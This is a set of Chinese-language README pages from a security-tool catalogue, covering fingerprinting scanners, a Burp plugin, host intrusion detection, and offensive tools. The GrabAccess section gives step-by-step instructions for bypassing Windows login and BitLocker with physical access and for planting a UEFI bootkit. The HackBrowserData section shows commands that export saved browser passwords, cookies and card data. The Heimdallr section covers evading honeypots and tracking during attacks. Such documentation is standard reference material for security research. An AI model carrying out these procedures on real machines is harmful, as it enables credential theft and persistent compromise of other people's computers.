usage: Glass.py [-h] [-i IP] [-f FILE] [-u URL] [-w WEB] [--proxy PROXY] [--proxy-list PROXYLIST] [-v] [--update] [-o OUTPUTTARGET] [-s SEARCH]
Glass scan.
optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP Input your ip.
-f FILE, --file FILE Input your ips.txt.
-u URL, --url URL Input your url.
-w WEB, --web WEB Input your webs.txt.
--proxy PROXY Input your proxy options(all or cn) or proxy address(127.0.0.1:8080).
--proxy-list PROXYLIST
List the proxys.
-v, --version Show program's version number and exit.
--update Update the program.
-o OUTPUTTARGET, --output OUTPUTTARGET
Select the output format.
-s SEARCH, --search SEARCH
Choose your search engine.
-i 可指定单独IP或者IP段(需添加您fofa的API或者zoomeye的API)
-f 批量要扫的IP或IP段(需添加您fofa的API或者zoomeye的API)
-u 单个url识别
-w 批量url识别
-s 指定搜索引擎
--proxy all/cn/http://127.0.0.1:8080 使用 all表示全部 cn表示国内或者自定义的代理(支持http、https)
--proxy-list all/cn 获取代理 all表示全部 cn表示国内
```
#### 相关配置更改
* API设置
1. 在`config/config.py`中`fofaApi`设置,输入对应的`email`与`key`即可
2. 在`config/config.py`中`zoomeyeApi`设置,输入`key`值即可
* 线程默认 `100`可在`config/config.py`中`threadNum`修改线程数 **(注:建议在200以内)**
* 每日一说可设置开启关闭,在`config/config.py`中`tosayRun`,`True`为开,`False`为关
* fofa会员搜索的更改,默认搜索`100`,在`config/config.py`中`fofaSize`更改,普通会员为`100`,高级`10000`,企业`100000`,请自行更改
Glass提供了**四种**指纹识别方式,可从本地读取识别,也可以从FOFA进行批量调用API识别(需要FOFA密钥)。
**1.本地识别:**
```bash
python Glass.py -u http://www.s7ck.com // 单url测试
python Glass.py -w url.txt // url文件内
```
**2.FOFA识别:**
注意:从FOFA识别需要配置FOFA 密钥以及邮箱,在`.../config/config.py`内配置好密钥以及邮箱即可使用。
```bash
fofaApi = {
"email": "admin@s7ck.com",
"key": "1234567890",
}
```
```
python3 Glass.py -i 127.0.0.1 //支持单IP资产
python3 Glass.py -i 127.0.0.1/24 //支持IP段资产
python3 Glass.py -f ips.txt //支持文本内IP资产,可添加IP段
```
#### 结果输出
结果输出在`../output/xxxxx.txt`
#### 识别规则添加方法
目前只加了对源码和`header`头文件进行识别,后面会陆续添加识别的规则以及方式
已加入`cookie`识别
规则文件在`config/rules.py`
**添加方法**
```
['CMS', 'headers', '(nginx)']
['CMS', 'cookie', '(MorkerSession)']
['CMS', 'code', '(<title>Morker</title>)']
三种识别方式,headers头文件识别,cookie识别,code源码识别
支持同方式多种识别内容,比如:
['CMS', 'code', '(<title>Morker</title>)|css/css.css']
注:单引号和反斜杆记得转义,转义符号为\
```
## 四、效果:
**1.本地识别:**


**2.fofa识别:**




<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/GrabAccess.md
================================================
## GrabAccess <https://github.com/Push3AX/GrabAccess>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
## GrabAccess
**Bookit / Windows登陆密码和Bitlocker绕过工具**
------
[**中文**](https://github.com/Push3AX/GrabAccess/blob/main/readme_cn.md) | [English](https://github.com/Push3AX/GrabAccess/blob/main/readme.md)
在物理接触的情况下,GrabAccess可以:
1. 绕过Windows登陆密码执行任意操作(以System权限执行命令、重置Windows账户密码等)
2. 植入木马并添加自启动(可以绕过Bitlocker,但要求受害者登录)
3. 通过修改主板UEFI固件实现无视重装系统、更换硬盘的持久化(Bootkit)
## 快速开始
GrabAccess最基础的功能是绕过Windows登录密码。
1. 准备一个U盘。(需为`FAT16`或`FAT32`格式)
2. 下载[GrabAccess_Release.zip](https://github.com/Push3AX/GrabAccess/releases/download/Version1.1/GrabAccess_Release_1.1.0.zip),解压到U盘根目录。

3. 将U盘插入目标计算机。重启,在启动时进入BIOS菜单。选择从U盘启动(如果开启了`Security Boot`,还需将其设置为`DISABLE`).

4. 在Windows启动时会弹出CMD窗口和账户管理窗口,可以System权限执行任意命令而无需登录。

5. 按下`ALT+F4`关闭CMD窗口后,Windows回到登陆界面。
## 自动化植入(支持绕过 Bitlocker)
GrabAccess可以自动植入指定的程序,并为其添加启动项。
要使用该功能,需要预先将GrabAccess与要植入的程序打包:
1. 下载[GrabAccess_Release.zip](https://github.com/Push3AX/GrabAccess/releases/download/Version1.1/GrabAccess_Release_1.1.0.zip),解压并放置在U盘根目录。
2. 将需要植入的程序命名为`payload.exe`,放置在U盘根目录。
3. 运行`build.bat`进行打包。

4. 将U盘插入目标计算机、从U盘启动(与前文相同)
5. Windows启动后即可看到指定的程序。

该植入过程可以绕过Bitlocker的系统盘加密。
从含有GrabAccess的U盘启动后,GrabAccess就会写入到内存中。此时可以拔出U盘,但需要停留在Bitlocker输入密码的界面,等待受害者返回输入密码。当Bitlocker解锁之后,指定的程序会被写入磁盘。但在这之前,由于GrabAccess仅停留在内存,如果重启或关机,GrabAccess将会失效。
## 修改主板UEFI固件实现Bootkit
GrabAccess可以被植入到计算机主板的UEFI固件。实现硬件级别的持久化(Bootkit)。
每次Windows系统启动时,GrabAccess会植入指定的程序,即使重装系统或更换硬盘之后也会重新植入。要移除它,只能刷写主板固件或更换主板。
**警告:以下操作可能损坏主板!必须对UEFI固件有一定了解才可继续。AT YOUR OWN RISK !!!!**
要实现这一功能,大致分为四步:
1. 将GrabAccess与要植入的程序打包
2. 提取主板UEFI固件
3. 向UEFI固件插入GrabAccessDXE
4. 将固件刷回主板
不同主板的第2和第4步有较大不同。部分主板可以通过软件方式刷新固件,但也有部分主板存在校验,只能使用编程器刷新。因差异众多,在此不深入讨论,读者可以自行在网上搜索某型号主板对应的方式。
将GrabAccess与要植入的程序打包的方式与前文相同,即:将需要植入的程序命名为payload.exe,放置在GrabAccess的根目录,运行build.bat进行打包。结束后得到`native.exe`,稍后将会用到。
在提取到主板UEFI固件后,使用[UEFITool](https://github.com/LongSoft/UEFITool)打开,按下`Ctrl+F`,选择`Text`,搜索`pcibus`,在下方双击搜索到的第一项。

在`pcibus`这一项上右键,选择`Insert before`,然后选取[GrabAccess_Release.zip](https://github.com/Push3AX/GrabAccess/releases/download/Version1.1/GrabAccess_Release_1.1.0.zip)中`UEFI_FSS`文件夹的`GrabAccessDXE.ffs`。

插入`GrabAccessDXE`后,在`GrabAccessDXE`上右键,选择`Insert before`,插入`UEFI_FSS`文件夹的`native.ffs`。此时应该如下所示:

双击展开`native.ffs`(它没有名字,但GUID是`2136252F-5F7C-486D-B89F-545EC42AD45C`),在`Raw section`上右键,选择`Replace body`,然后选取前文中生成的`native.exe`进行替换。

最后,点击File菜单的`Save image file`,保存固件到文件。
这份固件已经成功植入了Bootkit,将其刷回主板。如果一切顺利,在每一次Windows启动过程中,`native.exe`都会被写入并执行。
如果没有成功,可以尝试以下操作:
1. 关闭UEFI设置中的`Security Boot`和`CSM`,确定操作系统是通过UEFI模式加载的。
2. 向固件插入`UEFI_FSS`文件夹下的`pcddxe.ffs`(方法同前文。但注意,这个模块可能会与其它模块冲突造成不能开机,仅建议在使用编程器的情况下尝试!)
## 系统支持情况
GrabAccess仅支持UEFI引导下的Windows系统,目前仅支持x64系统。
已测试Windows 10 (1803, 22H2)和Windows 11(23H2)。包括使用了TPM、联网账户、Pin码的情况。但不支持绕过Security Boot。
# 原理解析
## Windows Platform Binary Table
和Kon-boot篡改Windows内核不同,GrabAccess的工作原理,源自于Windows的一项合法后门:WPBT(Windows Platform Binary Table)。
WPBT常用于计算机制造商植入驱动管理软件、防丢软件。类似Bootkit病毒,一旦主板中存在WPBT条目,无论是重装系统还是更换硬盘,只要使用Windows系统,开机后都会被安装指定程序。
WPBT的原始设计,应当是由生产商在主板的UEFI固件中插入一个特定的模块实现。但是,通过劫持UEFI的引导过程,攻击者可以插入WPBT条目,而无需修改主板固件。
## GrabAccess做了什么
GrabAccess包含两个部分。
其一是用于写入WPBT条目的UEFI应用程序,即源码中的Stage1-UEFI。它们用于在UEFI环境下向ACPI表写入WPBT条目。
其二是一个Windows Native Application,即源码中的Stage2-NativeNT,用于写出最终Payload和添加启动项。
## Native Application做了什么
WPBT所加载的应用程序,并非常规的Win32程序。而是一个Windows Native Application。它在Windows Native NT阶段执行,早于用户登录。但是Windows提供给Native APP的API,也少于Win32程序。
源码中的Stage2-NativeNT负责将其末尾的最终Payload(即用户打包的指定程序)写出到`C:\\Windows\\System32\\GrabAccess.exe`,并为其添加启动项`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GrabAccess`。
如果其末尾没有Payload,则通过IFEO劫持Logonui.exe,在Windows登录时显示cmd.exe和netplwiz.exe
## Credits
1. [Windows Platform Binary Table (WPBT) ](https://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx)
2. [WPBT-Builder ](https://github.com/tandasat/WPBT-Builder)
3. [Windows Native App by Fox](http://fox28813018.blogspot.com/2019/05/windows-platform-binary-table-wpbt-wpbt.html)
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/HaE.md
================================================
## HaE <https://github.com/gh0stkey/HaE>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
## 项目介绍
**HaE**是一款**网络安全(数据安全)领域**下的框架式项目,采用了**乐高积木式**模块化设计理念,实现对HTTP消息(包含WebSocket)精细化的标记和提取。
通过运用**多引擎**的自定义正则表达式,HaE能够准确匹配并处理HTTP请求与响应报文(包含WebSocket),对匹配成功的内容进行有效的标记和信息抽取,从而提升网络安全(数据安全)领域下的**漏洞和数据分析效率**。
> 随着现代化Web应用采用前后端分离的开发模式,日常漏洞挖掘的过程中,捕获的HTTP请求流量也相应增加。若想全面评估一个Web应用,会花费大量时间在无用的报文上。**HaE的出现旨在解决这类情况**,借助HaE,您能够**有效减少**测试时间,将更多精力集中在**有价值且有意义**的报文上,从而**提高漏洞挖掘效率**。
GitHub项目地址:https://github.com/gh0stkey/HaE
GitCode项目地址:https://gitcode.com/gh0stkey/HaE
**所获荣誉**:
1. [入选2022年KCon兵器谱](https://mp.weixin.qq.com/s/JohMsl1WD29LHCHuLf8mVQ)
2. [入选GitCode G-Star项目](https://gitcode.com/gh0stkey/HaE)
**注意事项**:
1. HaE 3.0版本开始采用`Montoya API`进行开发,使用新版HaE需要升级你的BurpSuite版本(>=2023.12.1)。
2. HaE 2.6版本后对规则字段进行了更新,因此无法适配<=2.6版本的规则,请用户自行前往[规则转换页面](https://gh0st.cn/HaE/ConversionRule.html)进行转换。
3. 自定义HaE规则必须用左右括号`()`将所需提取的表达式内容包含,例如你要匹配一个**Shiro应用**的响应报文,正常匹配规则为`rememberMe=delete`,在HaE的规则中就需要变成`(rememberMe=delete)`。
## 使用方法
插件装载: `Extender - Extensions - Add - Select File - Next`
初次装载`HaE`会从Jar包中加载离线的规则库,如果更新可以点击`Reinit`进行重新初始化。内置规则库地址可以在Github上找到:`https://github.com/gh0stkey/HaE/blob/master/src/main/resources/rules/Rules.yml`。
配置文件(`Config.yml`)和规则文件(`Rules.yml`)会放在固定目录下:
1. Linux/Mac用户的配置文件目录:`~/.config/HaE/`
2. Windows用户的配置文件目录:`%USERPROFILE%/.config/HaE/`
除此之外,您也可以选择将配置文件存放在`HaE Jar包`的同级目录下的`/.config/HaE/`中,**以便于离线携带**。
### 规则释义
HaE目前的规则一共有8个字段,详细的含义如下所示:
| 字段 | 含义 |
|-----------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Name | 规则名称,主要用于简短概括当前规则的作用。 |
| F-Regex | 规则正则,主要用于填写正则表达式。在HaE中所需提取匹配的内容需要用`(`、`)`将正则表达式进行包裹。|
| S-Regex | 规则正则,作用及使用同F-Regex。S-Regex为二次正则,可以用于对F-Regex匹配的数据结果进行二次的匹配提取,如不需要的情况下可以留空。|
| Format | 格式化输出,在NFA引擎的正则表达式中,我们可以通过`{0}`、`{1}`、`{2}`…的方式进行取分组格式化输出。默认情况下使用`{0}`即可。 |
| Scope | 规则作用域,主要用于表示当前规则作用于HTTP报文的哪个部分。支持请求、响应的行、头、体,以及完整的报文。 |
| Engine | 正则引擎,主要用于表示当前规则的正则表达式所使用的引擎。**DFA引擎**:对于文本串里的每一个字符只需扫描一次,速度快、特性少;**NFA引擎**:要翻来覆去标注字符、取消标注字符,速度慢,但是特性(如:分组、替换、分割)丰富。 |
| Color | 规则匹配颜色,主要用于表示当前规则匹配到对应HTTP报文时所需标记的高亮颜色。在HaE中具备颜色升级算法,当出现相同颜色时会自动向上升级一个颜色进行标记。 |
| Sensitive | 规则敏感性,主要用于表示当前规则对于大小写字母是否敏感,敏感(`True`)则严格按照大小写要求匹配,不敏感(`False`)则反之。 |
## 优势特点
1. **功能**:通过对HTTP报文的颜色高亮、注释和提取,帮助使用者获取有意义的信息,**聚焦高价值报文**。
2. **界面**:清晰可视的界面设计,以及**简洁的界面交互**,帮助使用者更轻松的了解和配置项目,**避免`多按钮`式的复杂体验**。
3. **查询**:将HTTP报文的高亮、注释和提取到的相关信息**集中在一个数据面板**,可以一键查询、提取信息,从而提高测试和梳理效率。
4. **算法**:内置高亮颜色的升级算法,当出现相同颜色时**会自动向上升级一个颜色**进行标记,**避免`屠龙者终成恶龙`场景**。
5. **管理**:**融入BurpSuite的项目数据管理**,当使用BurpSuite进行项目存储时HaE数据也会一并存储。
6. **实战**:官方规则库和规则字段作用功能,都是**基于实战化场景总结输出**的,**以此提高数据的有效性、精准性发现**。
| 界面名称 | 界面展示 |
| ------------------------ | ---------------------------------------------------- |
| Rules(规则管理) | <img src="https://github.com/gh0stkey/HaE/raw/master/images/rules.png" style="width: 80%" /> |
| Config(配置管理) | <img src="https://github.com/gh0stkey/HaE/raw/master/images/config.png" style="width: 80%" /> |
| Databoard(数据集合) | <img src="https://github.com/gh0stkey/HaE/raw/master/images/databoard.png" style="width: 80%" /> |
| MarkInfo(数据展示) | <img src="https://github.com/gh0stkey/HaE/raw/master/images/markinfo.png" style="width: 80%" /> |
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v5.1.1] - 2026-03-04
** 问题修复 **
- 修复MarkInfo标签页切换时触发数据重复写入,导致Databoard出现跨Host数据错乱的BUG。
** 贡献者信息**
- 感谢@Arg3Sea、Gnihton、强少张参与测试并提供宝贵建议的贡献者!
#### [v4.3.2] - 2025-11-25
** 问题修复 **
- 修复Databoard面板查询默认选中页面不是第一个的问题。
- 修复不同Host情况下返回相同内容导致数据无法查询问题。
** 贡献者信息**
- 感谢ArG3、冰淇霖帮助修复问题,并提供宝贵建议!
#### [v4.2.1] - 2025-05-08
**功能更新**
- 优化缓存池的存储逻辑,为正则部分添加缓存功能,一次编译多次使用。
- 新增动态响应头配置,用于去除动态响应头便于缓存。
- 新增3条规则,用于进行漏洞探测和验证:Vite DevMode、Passwd File、Win.ini File。
**问题修复**
- 为规则修改时候增加清空缓存机制,解决规则修改不生效问题。
- 优化YAML加载逻辑,确保安全可控的进行配置文件加载。
- 修复Config配置不能设为空的问题。
#### [v4.1.2] - 2025-04-02
**功能更新**
- 优化Databoard存储逻辑,提升查询速度。
- 优化Databoard双击搜索,提升检索效率。
- 新增并调整Databoard的Action按钮菜单,提供缓存、数据的多维度清理。
#### [v4.1.1] - 2025-03-25
**功能更新**
- 优化Databoard存储逻辑,提升数据处理速度。
**问题修复**
- 修复Databoard展示HTTP消息时存在的重复问题。
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/HackBrowserData.md
================================================
## HackBrowserData <https://github.com/moonD4rk/HackBrowserData>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
# HackBrowserData
`HackBrowserData` is a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks, credit cards, download history, localStorage and extensions) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.
> Disclaimer: This tool is only intended for security research. Users are responsible for all legal and related liabilities resulting from the use of this tool. The original author does not assume any legal responsibility.
## Supported Browser
### Windows
| Browser | Password | Cookie | Bookmark | History |
|:-------------------|:--------:|:------:|:--------:|:-------:|
| Google Chrome | ✅ | ✅ | ✅ | ✅ |
| Google Chrome Beta | ✅ | ✅ | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ | ✅ |
| Microsoft Edge | ✅ | ✅ | ✅ | ✅ |
| 360 Speed | ✅ | ✅ | ✅ | ✅ |
| QQ | ✅ | ✅ | ✅ | ✅ |
| Brave | ✅ | ✅ | ✅ | ✅ |
| Opera | ✅ | ✅ | ✅ | ✅ |
| OperaGX | ✅ | ✅ | ✅ | ✅ |
| Vivaldi | ✅ | ✅ | ✅ | ✅ |
| Yandex | ✅ | ✅ | ✅ | ✅ |
| CocCoc | ✅ | ✅ | ✅ | ✅ |
| Firefox | ✅ | ✅ | ✅ | ✅ |
| Firefox Beta | ✅ | ✅ | ✅ | ✅ |
| Firefox Dev | ✅ | ✅ | ✅ | ✅ |
| Firefox ESR | ✅ | ✅ | ✅ | ✅ |
| Firefox Nightly | ✅ | ✅ | ✅ | ✅ |
| Internet Explorer | ❌ | ❌ | ❌ | ❌ |
### MacOS
Based on Apple's security policy, some browsers **require a current user password** to decrypt.
| Browser | Password | Cookie | Bookmark | History |
|:-------------------|:--------:|:------:|:--------:|:-------:|
| Google Chrome | ✅ | ✅ | ✅ | ✅ |
| Google Chrome Beta | ✅ | ✅ | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ | ✅ |
| Microsoft Edge | ✅ | ✅ | ✅ | ✅ |
| Brave | ✅ | ✅ | ✅ | ✅ |
| Opera | ✅ | ✅ | ✅ | ✅ |
| OperaGX | ✅ | ✅ | ✅ | ✅ |
| Vivaldi | ✅ | ✅ | ✅ | ✅ |
| CocCoc | ✅ | ✅ | ✅ | ✅ |
| Yandex | ✅ | ✅ | ✅ | ✅ |
| Arc | ✅ | ✅ | ✅ | ✅ |
| Firefox | ✅ | ✅ | ✅ | ✅ |
| Firefox Beta | ✅ | ✅ | ✅ | ✅ |
| Firefox Dev | ✅ | ✅ | ✅ | ✅ |
| Firefox ESR | ✅ | ✅ | ✅ | ✅ |
| Firefox Nightly | ✅ | ✅ | ✅ | ✅ |
| Safari | ❌ | ❌ | ❌ | ❌ |
### Linux
| Browser | Password | Cookie | Bookmark | History |
|:-------------------|:--------:|:------:|:--------:|:-------:|
| Google Chrome | ✅ | ✅ | ✅ | ✅ |
| Google Chrome Beta | ✅ | ✅ | ✅ | ✅ |
| Chromium | ✅ | ✅ | ✅ | ✅ |
| Microsoft Edge Dev | ✅ | ✅ | ✅ | ✅ |
| Brave | ✅ | ✅ | ✅ | ✅ |
| Opera | ✅ | ✅ | ✅ | ✅ |
| Vivaldi | ✅ | ✅ | ✅ | ✅ |
| Firefox | ✅ | ✅ | ✅ | ✅ |
| Firefox Beta | ✅ | ✅ | ✅ | ✅ |
| Firefox Dev | ✅ | ✅ | ✅ | ✅ |
| Firefox ESR | ✅ | ✅ | ✅ | ✅ |
| Firefox Nightly | ✅ | ✅ | ✅ | ✅ |
## Getting started
### Install
Installation of `HackBrowserData` is dead-simple, just download [the release for your system](https://github.com/moonD4rk/HackBrowserData/releases) and run the binary.
> In some situations, this security tool will be treated as a virus by Windows Defender or other antivirus software and can not be executed. The code is all open source, you can modify and compile by yourself.
### Building from source
only support `go 1.21+` with go generics and `log/slog` standard library.
```bash
$ git clone https://github.com/moonD4rk/HackBrowserData
$ cd HackBrowserData/cmd/hack-browser-data
$ go build
```
### Cross compile
Here's an example of use `macOS` building for `Windows` and `Linux`
#### For Windows
```shell
GOOS=windows GOARCH=amd64 go build
```
#### For Linux
````shell
GOOS=linux GOARCH=amd64 go build
````
### Run
You can double-click to run, or use command line.
```powershell
PS C:\Users\moond4rk\Desktop> .\hack-browser-data.exe -h
NAME:
hack-browser-data - Export passwords|bookmarks|cookies|history|credit cards|download history|localStorage|extensions from browser
USAGE:
[hack-browser-data -b chrome -f json --dir results --zip]
Export all browsing data (passwords/cookies/history/bookmarks) from browser
Github Link: https://github.com/moonD4rk/HackBrowserData
VERSION:
0.4.6
GLOBAL OPTIONS:
--verbose, --vv verbose (default: false)
--compress, --zip compress result to zip (default: false)
--browser value, -b value available browsers: all|360|brave|chrome|chrome-beta|chromium|coccoc|dc|edge|firefox|opera|opera-gx|qq|sogou|vivaldi|yandex (default: "all")
--results-dir value, --dir value export dir (default: "results")
--format value, -f value output format: csv|json (default: "csv")
--profile-path value, -p value custom profile dir path, get with chrome://version
--full-export, --full is export full browsing data (default: true)
--help, -h show help
--version, -v print the version
```
For example, the following is an automatic scan of the browser on the current computer, outputting the decryption results in `JSON` format and compressing as `zip`.
```powershell
PS C:\Users\moond4rk\Desktop> .\hack-browser-data.exe -b all -f json --dir results --zip
PS C:\Users\moond4rk\Desktop> ls -l .\results\
Directory: C:\Users\moond4rk\Desktop\results
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/15/2024 10:55 PM 44982 results.zip
```
### Run with custom browser profile folder
If you want to export data from a custom browser profile folder, you can use the `-p` parameter to specify the path of the browser profile folder. PS: use double quotes to wrap the path.
```powershell
PS C:\Users\moond4rk\Desktop> .\hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"
[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_creditcard.csv success
[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_bookmark.csv success
[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_cookie.csv success
[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_history.csv success
[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_download.csv success
[NOTICE] [browsingdata.go:59,Output] output to file results/chrome_password.csv success
```
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
- 2022-09-08 发布演示视频[404星链计划开源安全工具演示——HackBrowserData](https://www.bilibili.com/video/BV1eU4y1z7si)
## 最近更新
#### [v0.4.6] - 2024-07-16
**更新**
- 重构项目并更新 repo deploy
- 重构 logger 到标准库
- 移除 CGO go-sqlite3 改用纯 go 驱动
- 优化加解密模块
- 重构获取浏览器数据的逻辑
- 跳过 chromium 快照目录以找到正确的密码数据库
- 改进浏览浏览器配置文件目录时的错误处理
- 优化 GitHub 操作和依赖项更新
#### [v0.4.5] - 2024-01-09
**新增**
- 添加搜狗和dc浏览器
- 格式化项目布局
- 添加完全导出浏览数据选项
- 支持 macOS 的 Arc 浏览器
- 改进扩展解析
**修复**
- 修复日志错误并删除已弃用的 linter
- 修复运行二进制文件失败时的句柄错误
- 修复数据丢失导致标题为空的问题
- 修复命令行使用提示不完整的bug
- 修复错误的日志调用者跳过级别
- 修复 Firefox 文件遍历中的错误
- 解密主密钥失败时发出的警告
- 改进浏览数据和文件复制功能中的错误处理
**优化**
- 优化 JSON 缩进输出格式
- 优化添加提供商软件文件夹和 linter 检查
#### [v0.4.4] - 2022-08-16
**更新**
- 修复 chrome 在 windows 上获取 cookie 内容失败的问题
- 在 CI 中添加了更多检查
- 优化 golangci-lint 代码
- 修复压缩结果时无法访问文件的问题
#### [v0.4.3] - 2022-06-05
**更新**
- 新增支持从浏览器导出多个用户
- 修复当过滤结果为空并导出到 csv 时,对其进行 utf8 编码
- 修复 Windows 下 Chrome 和 OperaGx 的配置文件夹
- 修复拼写错误
#### [v0.4.2] - 2022-05-01
**更新**
- 新增导出扩展
- 新增设置控制台 log 日志的色彩
- 文档添加 HackBrowserData 的 logo
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Hades.md
================================================
## Hades <https://github.com/theSecHunter/Hades>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
[English](https://github.com/theSecHunter/Hades/blob/main/README.md) | 中文文档
Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。
- [Hboat (服务端 demo)](https://github.com/theSecHunter/Hboat)
- [Hades-Windows](https://github.com/theSecHunter/Hades-Linux) @TimelifeCzy
- [Hades-Linux](https://github.com/chriskaliX/Hades) @chriskaliX
目前该仓库为其他组件的整合,可以点击上述链接获取组件详情
<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
## 项目相关
## 最近更新
#### [v1.1.0] - 2023-01-31
**更新**
- ebpf插件支持arm64,支持简易端口扫描检测以及其余问题修复
- win插件支持进程拦截、注册表拦截、目录保护、注入检测
<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
================================================
FILE: detail/Heimdallr.md
================================================
## Heimdallr <https://github.com/graynjo/Heimdallr>
<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->





<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
**Heimdallr**是一款致力于被动嗅探浏览器流量,用于**提示漏洞框架指纹**、**告警拦截蜜罐请求**、**对抗浏览器特征追踪**(浏览器持久化、webRTC、Canvas画布等)的Chrome插件。


## 🥑安装
1. GitHub Releases 下载插件最新编译版本
2. Chrome浏览器-扩展设置-开发者模式-加载已解压的扩展程序

> 注意:Chrome版本需高于Chrome v96,部分代码逻辑不适配edge和firefox,请勿混用于非Chrome浏览器
## 🚀使用
### 基本功能
高危漏洞资产指纹识别和蜜罐jsonp请求识别功能无需配置,只要插件开启即可生效。
- 高危漏洞资产指纹识别规则103条,涉及框架或产品如下:
> ueditor、struts2、spring、weblogic、shiro、F5 BIG-IP、致远OA、用友NC、用友畅捷通、通达OA、心通达OA、新点OA、帆软报表、蓝凌OA、红帆OA、华天动力OA、万户OA、金蝶云、协众OA、金和OA、海昌OA、泛微多个产品(ecology、eoffice、ebridge、emobile)、拓尔思SSO、拓尔思内容管理系统、亿邮邮件、coremail邮件、Exchange邮件、若依后台管理系统、Wordpress、小鱼易连云视讯、tomcat、iis、jboss、jetty、ibm websphere、weblogic、thinkphp、showdoc、Laravel、kindeditor、fckeditor、ewebeditor、jeesite、海康威视多个产品(网络摄像头、安防管理平台、图像综合应用平台)、dedecms、jira、confluence、java web、博达站群、dubbo、向日葵客户端、宝塔waf、宝塔面板、米拓cms、teleport堡垒机、齐治堡垒机、帕拉迪堡垒机、H3C堡垒机、绿盟防火墙、安全狗Waf
- 蜜罐特征告警规则151条,涉及敏感域名请求(jsonp)、蜜罐网页资源特征、蜜罐对本机特殊软件(如Burpsuite)的探测请求、网站流量分析与跟踪请求、敏感关键词、敏感脚本调用等。
> 为了保证请求的最全面捕获,Heimdallr中不进行请求种类(如script、XMLHttpRequest等)的筛选,因此插件默认只进行蜜罐请求识别而不作拦截,若开启蜜罐请求拦截会影响正常访问CSDN、Github等网站的正常访问,可以通过日常使用时暂停插件(控制-暂停/开启插件)或关闭蜜罐拦截功能(策略配置-蜜罐拦截配置)解决。
>
> 因部分框架或产品(如百度网站在线客服会调用5个敏感域名、高德地图嵌入会调用高德域名)的正常使用也会出现Jsonp敏感域名的访问,故同一站点的Jsonp请求超过10个时,基本可以确定为蜜罐站点,此时将会出现系统弹窗告警(弹窗需要操作系统开启浏览器弹窗权限,该权限默认开启)。低于10个的敏感域名请求,使用者可根据当前站点内容和告警域名的关联度进行判断,例如某个小企业官网可能调用百度商桥接口实现在线客服功能,但一般不会调用虎牙直播账号接口或联通一键登录热点溯源接口。
### 控制
右上角三个选项分别为暂停/开启插件、清除所有嗅探结果集、设置选项。
> 暂停插件后,会清空所有页面的嗅探结果集,关闭对请求和响应的监听,扩展功能中仅WebRTC防护功能不关闭,其他的功能都会随插件暂停而暂停。
### 扩展功能
扩展功能由策略配置页面配置

#### 被动识别配置-启用响应体规则匹配
- 建议设置:仅在攻击期间对需高度关注页面(口子、靶标)开启该选项,用完即关
> 默认情况下,被动嗅探只对请求响应的URL、Request Header、Request Body、Response Header进行匹配,仅有较少部分高危指纹在Response Body中检测,开启该选项后会启用devtools调用chrome devtools protocol,检测Response Body中的指纹。但是启用该选项后会出现调试提示栏,如需关闭参考高级-4
#### 被动识别配置-关闭浏览器页面缓存(强制刷新)
- 建议设置:默认开启该选项
> 部分包含特征规则的静态资源(如JS文件)会在一次调用后存储在磁盘中,减少重复加载耗费的流量和带宽。这会导致识别规则在重复刷新页面是不会重复触发。开启该选项后可以达到更完善的特征识别,这也可以防止部分情况下静态资源文件不能及时更新导致的访问异常
#### 蜜罐拦截配置-符合蜜罐特征请求自动拦截
- 建议设置:攻击期间开启,日常使用时关闭
> 为保证能够识别、阻断部分新的Jsonp请求,插件按照请求域名进行拦截,这会导致开启该选项后访问部分日常网站(CSDN、GitHub等)会被阻断,影响日常访问。因此默认情况下插件不会拦截疑似蜜罐的Jsonp请求,需要手动开启拦截选项.日常网站被拦截也可以通过右上角的暂停插件按钮暂停,访问结束后重新启动插件。但是更建议的方式为日常使用浏览器和攻击使用浏览器分离开来,专事专用
#### 特征对抗配置-清除所有浏览器持久化项数据
- 建议设置:在被cookie追踪或其他持久化手段追踪浏览器特征时清除数据
